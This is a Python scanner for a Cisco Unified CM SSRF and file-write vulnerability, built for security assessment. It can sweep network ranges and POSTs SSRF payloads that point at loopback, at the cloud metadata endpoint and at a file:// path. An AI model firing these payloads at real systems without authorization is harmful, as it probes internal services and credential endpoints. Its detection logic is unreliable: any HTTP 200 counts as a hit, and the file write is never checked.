#!/usr/bin/env python3
"""
CVE-2026-20230 — Cisco Unified CM SSRF + File Write Vulnerability Scanner
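Async scanner that probes Cisco Unified CM web endpoints over HTTPS and scores
SSRF / file-write indicators. Run it only against systems you are authorized
to test.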

Author: Advanced Persistent Security Research
"""

from __future__ import annotations

import argparse
import asyncio
import ipaddress
import json
import re
import socket
import sys
import time
from collections.abc import Sequence
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass, field, asdict
from datetime import datetime, timezone
from enum import IntEnum, auto
from pathlib import Path
from typing import Any
from urllib.parse import urljoin, urlparse

import aiohttp
from colorama import Fore, Style, init

init(autoreset=True)  # colorama: reset colours automatically after each print


# ---------------------------------------------------------------------------
# Constants & Configuration
# ---------------------------------------------------------------------------

# Default for --timeout; AsyncProber passes it to aiohttp.ClientTimeout(total=...).
DEFAULT_TIMEOUT = 12
# Default for --threads; AsyncProber also uses it to size the aiohttp connector.
CONCURRENCY = 80
# Not referenced in the code visible in this file; same value as WEB_SSL_PORT.
WEB_PORT = 8443
# Port analyze_host uses for every HTTPS probe and SSRF check.
WEB_SSL_PORT = 8443

# Cisco Unified CM endpoints.
# analyze_host probes only the first four entries.
CISCO_ENDPOINTS = [
    "/webdialer/Webdialer",
    "/ucmuser/",
    "/cucim-service/",
    "/console/",
    "/admin/",
    "/xmldirectorylistener/",
]

# SSRF test targets: URLs submitted as the "destination"/"url" form fields.
# analyze_host tries only the first three entries.
SSRF_TEST_URLS = [
    "http://127.0.0.1/",
    "http://[::1]/",
    "http://169.254.169.254/latest/meta-data/",
    "http://localhost:22/",
    "http://localhost:9200/",
]

# File write test pattern: file name appended to "file:///tmp/" by
# AsyncProber.test_file_write.
FILE_WRITE_TEST = "SSRF_TEST_FILE"

class Color:
    """Named colorama style strings used to colour console output."""

    # Each value is a colorama foreground colour concatenated with the bright style.
    OKGREEN = Fore.GREEN + Style.BRIGHT
    OKBLUE = Fore.BLUE + Style.BRIGHT
    OKCYAN = Fore.CYAN + Style.BRIGHT
    OKMAGENTA = Fore.MAGENTA + Style.BRIGHT
    WARNING = Fore.YELLOW + Style.BRIGHT
    FAIL = Fore.RED + Style.BRIGHT
    # Resets all styling; used to terminate a coloured span.
    RESET = Style.RESET_ALL
    # Bright style without a colour change.
    BOLD = Style.BRIGHT


class VulnStatus(IntEnum):
    """Verdict assigned to a scanned host by the assessment step.

    Values are spelled out explicitly; they run from 1 (VULNERABLE) to
    5 (UNKNOWN) in declaration order.
    """

    VULNERABLE = 1
    LIKELY = 2
    POSSIBLE = 3
    NOT_VULNERABLE = 4
    UNKNOWN = 5


@dataclass(frozen=True, slots=True)
class ServiceProbe:
    """Immutable record of a single probe against one port.

    Instances are frozen, so attributes cannot be reassigned after creation;
    the ``vuln_indicators`` dict itself can still be mutated in place.
    """

    port: int  # TCP port that was probed
    protocol: str  # "https" for probes built by AsyncProber.probe_https
    status: str  # HTTP status code as text, or "error" when the request raised
    banner: str = ""  # "<status> <n> bytes" summary, or text describing the exception
    response_time_ms: float = 0.0  # elapsed wall-clock time in milliseconds
    # Free-form flags; assess_cisco_vulns reads the keys "ssrf_vulnerable",
    # "ssrf_target" and "file_write_vulnerable".
    vuln_indicators: dict[str, Any] = field(default_factory=dict)


@dataclass(frozen=True, slots=True)
class HostResult:
    """Immutable summary of everything learned about one scanned target.

    The dataclass is frozen: attributes cannot be reassigned once the object
    exists, although the list and dict fields can still be mutated in place.
    """

    target: str
    ip: str
    hostname: str = ""
    status: VulnStatus = VulnStatus.UNKNOWN
    confidence: int = 0
    findings: list[str] = field(default_factory=list)
    services: list[ServiceProbe] = field(default_factory=list)
    cve_matches: dict[str, bool] = field(default_factory=dict)
    recommendations: list[str] = field(default_factory=list)

    def to_dict(self) -> dict[str, Any]:
        """Return a plain-dict view of the result for JSON output.

        The status is emitted by enum member name and every service probe is
        expanded with ``dataclasses.asdict``; the remaining fields are passed
        through as they are.
        """
        serialized_services = [asdict(probe) for probe in self.services]
        payload: dict[str, Any] = dict(
            target=self.target,
            ip=self.ip,
            hostname=self.hostname,
            status=self.status.name,
            confidence=self.confidence,
            findings=self.findings,
            services=serialized_services,
            cve_matches=self.cve_matches,
            recommendations=self.recommendations,
        )
        return payload


# ---------------------------------------------------------------------------
# Async Probing Engine
# ---------------------------------------------------------------------------

class AsyncProber:
    """HTTPS prober that shares one ``aiohttp.ClientSession`` across requests.

    Use it as an async context manager: the session is created in
    ``__aenter__`` and closed in ``__aexit__``. The probe methods catch
    ``Exception`` and report failures in their return value instead of
    raising. TLS certificate verification is disabled (``ssl=False``) for
    every request.
    """

    # Total time budget, in seconds, for a single SSRF test request.
    _SSRF_TIMEOUT = 8

    def __init__(self, timeout: int = DEFAULT_TIMEOUT):
        """Store the session-wide timeout.

        Args:
            timeout: Total seconds allowed per request; the connect phase is
                capped separately at 5 seconds.
        """
        self.timeout = aiohttp.ClientTimeout(total=timeout, connect=5)
        self._session: aiohttp.ClientSession | None = None

    async def __aenter__(self) -> "AsyncProber":
        """Create the shared session and return ``self``."""
        conn = aiohttp.TCPConnector(
            limit=CONCURRENCY,
            limit_per_host=CONCURRENCY // 2,
            ssl=False,
            enable_cleanup_closed=True,
        )
        self._session = aiohttp.ClientSession(connector=conn, timeout=self.timeout)
        return self

    async def __aexit__(self, *args: object) -> None:
        """Close the shared session, if one was opened."""
        # Clear the attribute first so a later probe call reports a clear
        # "not inside async with" error instead of using a closed session.
        session, self._session = self._session, None
        if session is not None:
            await session.close()

    @staticmethod
    def _build_url(ip: str, port: int, path: str) -> str:
        """Return ``https://host:port/path``, bracketing IPv6 literals."""
        host = ip
        try:
            if ipaddress.ip_address(ip).version == 6:
                # A bare IPv6 literal is ambiguous next to ":port" in a URL.
                host = f"[{ip}]"
        except ValueError:
            # Not an IP literal (for example a hostname): use it unchanged.
            pass
        return f"https://{host}:{port}{path}"

    def _require_session(self) -> aiohttp.ClientSession:
        """Return the open session or raise ``RuntimeError`` if there is none."""
        if self._session is None:
            raise RuntimeError("AsyncProber must be used inside 'async with'")
        return self._session

    @staticmethod
    def _describe_error(exc: Exception) -> str:
        """Return the exception text, or its class name when the text is empty."""
        # Some exceptions (e.g. timeouts) stringify to "", which would leave
        # the caller with no hint about what went wrong.
        return str(exc) or type(exc).__name__

    async def probe_https(self, ip: str, port: int, path: str = "/", method: str = "GET",
                         data: dict | None = None) -> ServiceProbe:
        """Request ``https://ip:port/path`` and summarise the response.

        Args:
            ip: Target address or hostname.
            port: Target TCP port.
            path: URL path, starting with ``/``.
            method: ``"POST"`` sends a POST with ``data``; any other value
                sends a GET.
            data: Form data for POST requests; ignored for GET.

        Returns:
            A ``ServiceProbe`` whose ``status`` is the HTTP status code as
            text and whose ``banner`` is ``"<status> <n> bytes"``. If the
            request fails, ``status`` is ``"error"`` and ``banner`` describes
            the exception.
        """
        start = time.perf_counter()
        url = self._build_url(ip, port, path)
        try:
            session = self._require_session()
            if method == "POST":
                verb, extra = "POST", {"data": data}
            else:
                verb, extra = "GET", {}
            async with session.request(verb, url, ssl=False,
                                       allow_redirects=True, **extra) as resp:
                # errors="replace" keeps undecodable bodies from being
                # reported as a failed probe.
                body = await resp.text(errors="replace")
                elapsed = (time.perf_counter() - start) * 1000
                return ServiceProbe(
                    port=port, protocol="https", status=str(resp.status),
                    banner=f"{resp.status} {len(body)} bytes",
                    response_time_ms=elapsed,
                )
        except Exception as exc:
            elapsed = (time.perf_counter() - start) * 1000
            return ServiceProbe(port=port, protocol="https", status="error",
                                banner=self._describe_error(exc),
                                response_time_ms=elapsed)

    async def test_ssrf(self, ip: str, port: int, path: str, target_url: str) -> dict[str, Any]:
        """POST ``target_url`` to ``path`` and report how the server answered.

        Args:
            ip: Target address or hostname.
            port: Target TCP port.
            path: Endpoint path that receives the form POST.
            target_url: URL placed in the ``destination`` and ``url`` fields.

        Returns:
            A dict with ``vulnerable`` (bool), ``status`` (HTTP status, 0 if
            the request failed) and ``response`` (first 500 characters of the
            body, or a description of the exception).
        """
        result: dict[str, Any] = {"vulnerable": False, "response": "", "status": 0}
        url = self._build_url(ip, port, path)
        data = {
            "destination": target_url,
            "url": target_url,
            "action": "doSomething",
        }
        try:
            session = self._require_session()
            async with session.post(
                url, data=data, ssl=False,
                timeout=aiohttp.ClientTimeout(total=self._SSRF_TIMEOUT),
            ) as resp:
                body = await resp.text(errors="replace")
                result["status"] = resp.status
                result["response"] = body[:500]
                # NOTE(review): any HTTP 200 with a non-empty body counts as a
                # hit, which an ordinary login or error page also satisfies.
                # Treat this as a candidate signal, not proof of SSRF.
                if resp.status == 200 and body:
                    result["vulnerable"] = True
        except Exception as exc:
            result["response"] = self._describe_error(exc)
        return result

    async def test_file_write(self, ip: str, port: int, path: str) -> dict[str, Any]:
        """Repeat the SSRF test with a ``file://`` URL under ``/tmp``.

        No attempt is made to verify that a file was created; the result
        simply mirrors the ``vulnerable`` flag returned by ``test_ssrf``.

        Returns:
            A dict with ``vulnerable`` (bool) and ``details`` (str).
        """
        result: dict[str, Any] = {"vulnerable": False, "details": ""}
        test_url = f"file:///tmp/{FILE_WRITE_TEST}"
        ssrf_result = await self.test_ssrf(ip, port, path, test_url)
        if ssrf_result["vulnerable"]:
            result["vulnerable"] = True
            result["details"] = "File write via file:// SSRF possible"
        return result


# ---------------------------------------------------------------------------
# Vulnerability Assessment
# ---------------------------------------------------------------------------

def assess_cisco_vulns(result: HostResult) -> tuple[VulnStatus, int, dict[str, bool]]:
    """Score a host's probe results and map the score to a verdict.

    Scoring, applied to every entry in ``result.services``:
      * +15 if the banner mentions "cisco", "ucm" or "callmanager"
      * +30 if ``vuln_indicators["ssrf_vulnerable"]`` is truthy
      * +25 if ``vuln_indicators["file_write_vulnerable"]`` is truthy
      * +10 if "webdialer" appears in the banner or status

    Verdict thresholds: >= 70 VULNERABLE, >= 40 LIKELY, >= 20 POSSIBLE,
    > 0 NOT_VULNERABLE, otherwise UNKNOWN.

    Side effect: the human-readable reason behind each score increment is
    appended to ``result.findings`` (skipping entries already present), since
    the return value has no slot for them.

    Args:
        result: Host record whose ``services`` are evaluated.

    Returns:
        ``(status, confidence, cve_matches)``. ``confidence`` is the score
        capped at 100. ``cve_matches["CVE-2026-20230"]`` is True only when
        both the SSRF and the file-write indicator were seen.
    """
    score = 0
    findings: list[str] = []
    ssrf_seen = False
    file_write_seen = False

    for svc in result.services:
        banner_lower = svc.banner.lower()
        vuln_indicators = svc.vuln_indicators

        # Cisco device fingerprint.
        # NOTE(review): probe_https formats successful banners as
        # "<status> <n> bytes", so these keyword checks can only match if a
        # banner happens to contain the words (e.g. inside an error message).
        if any(marker in banner_lower for marker in ("cisco", "ucm", "callmanager")):
            score += 15
            findings.append(f"Cisco Unified CM identified: {svc.banner[:100]}")

        # SSRF confirmation
        if vuln_indicators.get("ssrf_vulnerable"):
            ssrf_seen = True
            score += 30
            findings.append(f"SSRF confirmed: {vuln_indicators.get('ssrf_target', 'unknown')}")

        # File write confirmation
        if vuln_indicators.get("file_write_vulnerable"):
            file_write_seen = True
            score += 25
            findings.append("File write via SSRF confirmed")

        # Webdialer endpoint presence
        if "webdialer" in banner_lower or "webdialer" in svc.status:
            score += 10
            findings.append("Cisco Webdialer service detected")

    # The CVE covers the SSRF + file-write chain, so require both indicators.
    cve_matches = {"CVE-2026-20230": ssrf_seen and file_write_seen}

    # Surface the reasons to the caller; the membership check keeps repeated
    # calls on the same result from duplicating entries.
    for note in findings:
        if note not in result.findings:
            result.findings.append(note)

    confidence = min(score, 100)
    if score >= 70:
        return VulnStatus.VULNERABLE, confidence, cve_matches
    if score >= 40:
        return VulnStatus.LIKELY, confidence, cve_matches
    if score >= 20:
        return VulnStatus.POSSIBLE, confidence, cve_matches
    if score > 0:
        return VulnStatus.NOT_VULNERABLE, confidence, cve_matches
    return VulnStatus.UNKNOWN, confidence, cve_matches


# ---------------------------------------------------------------------------
# Host Analysis Pipeline
# ---------------------------------------------------------------------------

async def analyze_host(prober: AsyncProber, ip: str) -> HostResult:
    """Probe one target, run the SSRF checks and build its ``HostResult``.

    Steps:
      1. Probe the first four ``CISCO_ENDPOINTS`` on ``WEB_SSL_PORT``.
      2. If any probe returned HTTP 200 (or mentions "webdialer"), submit the
         first three ``SSRF_TEST_URLS`` to ``/webdialer/Webdialer``, followed
         by the file-write check when an SSRF test is flagged.
      3. Attach the collected indicators to the probe that triggered the
         checks, so that ``assess_cisco_vulns`` can score them.
      4. Resolve the reverse-DNS name (best effort).
      5. Assess the result and build the final, fully populated record.

    Args:
        prober: Open ``AsyncProber`` used for all requests.
        ip: Target address.

    Returns:
        The completed ``HostResult``. ``HostResult`` is frozen, so it is
        constructed once with every field instead of being mutated.
    """
    services: list[ServiceProbe] = []

    # Probe Cisco CUCM web interface (limited to the key endpoints).
    for endpoint in CISCO_ENDPOINTS[:4]:
        services.append(await prober.probe_https(ip, WEB_SSL_PORT, endpoint))

    # Only the first responsive probe triggers the SSRF checks.
    trigger_index = next(
        (
            index
            for index, svc in enumerate(services)
            if "webdialer" in svc.banner.lower() or svc.status == "200"
        ),
        None,
    )

    if trigger_index is not None:
        vuln_indicators: dict[str, Any] = {}
        for test_url in SSRF_TEST_URLS[:3]:
            ssrf_result = await prober.test_ssrf(ip, WEB_SSL_PORT, "/webdialer/Webdialer", test_url)
            if ssrf_result["vulnerable"]:
                vuln_indicators["ssrf_vulnerable"] = True
                vuln_indicators["ssrf_target"] = test_url
                vuln_indicators["ssrf_response"] = ssrf_result["response"][:200]
                break

        # Test file write only if SSRF was flagged.
        if vuln_indicators.get("ssrf_vulnerable"):
            fw_result = await prober.test_file_write(ip, WEB_SSL_PORT, "/webdialer/Webdialer")
            if fw_result["vulnerable"]:
                vuln_indicators["file_write_vulnerable"] = True

        if vuln_indicators:
            # ServiceProbe is frozen, so swap in a copy that carries the
            # indicators; otherwise the assessment would never see them.
            original = services[trigger_index]
            services[trigger_index] = ServiceProbe(
                port=original.port,
                protocol=original.protocol,
                status=original.status,
                banner=original.banner,
                response_time_ms=original.response_time_ms,
                vuln_indicators={**original.vuln_indicators, **vuln_indicators},
            )

    # Hostname resolution. gethostbyaddr blocks, so run it in a worker thread
    # to keep the event loop free for the other hosts' probes.
    hostname = ""
    try:
        hostname = (await asyncio.to_thread(socket.gethostbyaddr, ip))[0]
    except (OSError, ValueError):
        # Reverse DNS is best-effort: lookup failures (OSError family) and
        # malformed names (ValueError family) leave the hostname empty.
        pass

    # The assessment only needs the services, so score a draft record first.
    draft = HostResult(target=ip, ip=ip, hostname=hostname, services=services)
    status, confidence, cve_matches = assess_cisco_vulns(draft)

    # Keep anything already recorded on the draft's findings list (it may be
    # empty), then add one line per endpoint that answered HTTP 200.
    findings = list(draft.findings)
    findings.extend(
        f"{svc.protocol}/{svc.port}: {svc.banner[:120]}"
        for svc in services
        if svc.status == "200"
    )

    recommendations: list[str] = []
    if status in (VulnStatus.VULNERABLE, VulnStatus.LIKELY):
        recommendations = [
            "IMMEDIATE: Apply Cisco security patch for CVE-2026-20230",
            "Restrict CUCM web interface to internal network only",
            "Disable Webdialer service if not required",
            "Enable TLS certificate validation and strict cipher suites",
        ]

    return HostResult(
        target=ip,
        ip=ip,
        hostname=hostname,
        status=status,
        confidence=confidence,
        findings=findings,
        services=services,
        cve_matches=cve_matches,
        recommendations=recommendations,
    )


# ---------------------------------------------------------------------------
# CLI / Main
# ---------------------------------------------------------------------------

def print_banner() -> None:
    """Print the boxed scanner title, coloured with ``Color.FAIL``."""
    # The box keeps its own leading and trailing newline so the colour codes
    # end up on separate lines from the frame.
    box = """
╔══════════════════════════════════════════════════════════════════════════════╗
║  CVE-2026-20230 — Cisco Unified CM SSRF + File Write Scanner                ║
║  Military-Grade Async Reconnaissance & Exploitability Assessment             ║
╚══════════════════════════════════════════════════════════════════════════════╝
"""
    print(f"\n{Color.FAIL}{box}{Color.RESET}")


def _positive_int(value: str) -> int:
    """argparse ``type=`` converter that accepts only integers >= 1."""
    try:
        number = int(value)
    except ValueError:
        raise argparse.ArgumentTypeError(f"invalid integer value: {value!r}") from None
    if number < 1:
        raise argparse.ArgumentTypeError(f"must be a positive integer, got {number}")
    return number


def parse_args() -> argparse.Namespace:
    """Parse the command line.

    ``--timeout`` and ``--threads`` must be positive integers: a concurrency
    of zero would create a semaphore that never admits a task, and negative
    values are rejected further down the pipeline with less helpful errors.
    argparse reports invalid values and exits with status 2.

    Returns:
        Namespace with ``network``, ``target``, ``file``, ``output``,
        ``timeout`` and ``threads``.
    """
    p = argparse.ArgumentParser(
        description="CVE-2026-20230 Cisco Unified CM Scanner",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python scanner.py -n 10.0.0.0/24
  python scanner.py -t 10.0.0.50 -o results.json
  python scanner.py -f targets.txt --threads 200
        """,
    )
    p.add_argument("-n", "--network", help="CIDR network range (e.g. 10.0.0.0/24)")
    p.add_argument("-t", "--target", help="Single target IP")
    p.add_argument("-f", "--file", help="File with target IPs (one per line)")
    p.add_argument("-o", "--output", help="JSON output file")
    p.add_argument("--timeout", type=_positive_int, default=DEFAULT_TIMEOUT,
                   help=f"Timeout per probe (default {DEFAULT_TIMEOUT}s)")
    p.add_argument("--threads", type=_positive_int, default=CONCURRENCY,
                   help=f"Concurrent probes (default {CONCURRENCY})")
    return p.parse_args()


def load_targets(args: argparse.Namespace) -> list[str]:
    """Collect scan targets from ``-t``, ``-f`` and ``-n``.

    Targets are gathered in that order and de-duplicated while preserving
    first-seen order, so a host named by several options is scanned once.
    In the target file, blank lines and lines starting with ``#`` are
    skipped.

    Args:
        args: Parsed command line with ``target``, ``file`` and ``network``.

    Returns:
        The unique target strings; empty if no option was given.

    Exits with status 1 after printing a message when the target file cannot
    be read or the CIDR range is invalid.
    """
    targets: list[str] = []
    if args.target:
        targets.append(args.target)
    if args.file:
        try:
            with open(args.file, encoding="utf-8") as fh:
                for raw_line in fh:
                    entry = raw_line.strip()
                    if entry and not entry.startswith("#"):
                        targets.append(entry)
        except (OSError, UnicodeDecodeError) as exc:
            # Same reporting style as the invalid-CIDR case below.
            print(f"{Color.FAIL}[!] Cannot read target file: {exc}{Color.RESET}")
            sys.exit(1)
    if args.network:
        try:
            net = ipaddress.ip_network(args.network, strict=False)
        except ValueError as exc:
            print(f"{Color.FAIL}[!] Invalid CIDR: {exc}{Color.RESET}")
            sys.exit(1)
        targets.extend(str(host) for host in net.hosts())
    # dict.fromkeys drops duplicates while keeping insertion order.
    return list(dict.fromkeys(targets))


async def main_async() -> None:
    """Run the scan: parse arguments, analyse every target, report results.

    Hosts are analysed concurrently, bounded by a semaphore sized from
    ``--threads``. Each result is printed as soon as it completes, so output
    order follows completion order. A failure while analysing one host is
    reported and recorded as an UNKNOWN result instead of aborting the scan.
    When ``--output`` is given, all results are written to that file as JSON.

    Exits with status 1 when no targets were supplied.
    """
    args = parse_args()
    print_banner()

    targets = load_targets(args)
    if not targets:
        print(f"{Color.WARNING}[!] No targets specified. Use -n, -t, or -f.{Color.RESET}")
        sys.exit(1)

    print(f"{Color.OKBLUE}[*] Loaded {len(targets)} target(s){Color.RESET}")
    print(f"{Color.OKBLUE}[*] Timeout: {args.timeout}s | Concurrency: {args.threads}{Color.RESET}")

    # Built once; the mapping does not change between results.
    status_colors = {
        VulnStatus.VULNERABLE: Color.FAIL,
        VulnStatus.LIKELY: Color.WARNING,
        VulnStatus.POSSIBLE: Color.OKCYAN,
        VulnStatus.NOT_VULNERABLE: Color.OKGREEN,
        VulnStatus.UNKNOWN: Color.OKMAGENTA,
    }

    results: list[HostResult] = []

    async with AsyncProber(timeout=args.timeout) as prober:
        # A semaphore of 0 would never admit a task; clamp to at least 1.
        semaphore = asyncio.Semaphore(max(1, args.threads))

        async def bounded_analyze(ip: str) -> HostResult:
            """Analyse one host under the concurrency limit."""
            async with semaphore:
                try:
                    return await analyze_host(prober, ip)
                except Exception as exc:
                    # Keep the scan going: report the failure and record a
                    # placeholder result for this host.
                    reason = f"Analysis failed: {type(exc).__name__}: {exc}"
                    print(f"{Color.WARNING}[!] {ip}: {reason}{Color.RESET}")
                    return HostResult(target=ip, ip=ip, findings=[reason])

        tasks = [bounded_analyze(t) for t in targets]
        for coro in asyncio.as_completed(tasks):
            result = await coro
            results.append(result)

            status_color = status_colors.get(result.status, Color.RESET)

            print(f"\n{Color.BOLD}Target: {result.ip}{Color.RESET}  Hostname: {result.hostname or 'N/A'}")
            print(f"Status: {status_color}{result.status.name}{Color.RESET} (confidence: {result.confidence}%)")
            for cve, match in result.cve_matches.items():
                if match:
                    print(f"  {Color.FAIL}>>> {cve} CONFIRMED{Color.RESET}")
            # Only the first five findings are shown on the console.
            for finding in result.findings[:5]:
                print(f"  → {finding}")

    if args.output:
        report = json.dumps([r.to_dict() for r in results], indent=2)
        Path(args.output).write_text(report, encoding="utf-8")
        print(f"\n{Color.OKGREEN}[*] Results written to {args.output}{Color.RESET}")


def main() -> None:
    """Synchronous entry point: run ``main_async`` until it finishes.

    Ctrl-C prints a short notice and ends the process with exit status 130.
    """
    try:
        asyncio.run(main_async())
    except KeyboardInterrupt:
        notice = f"\n{Color.WARNING}[!] Interrupted by user{Color.RESET}"
        print(notice)
        raise SystemExit(130)


# Run the scanner only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()
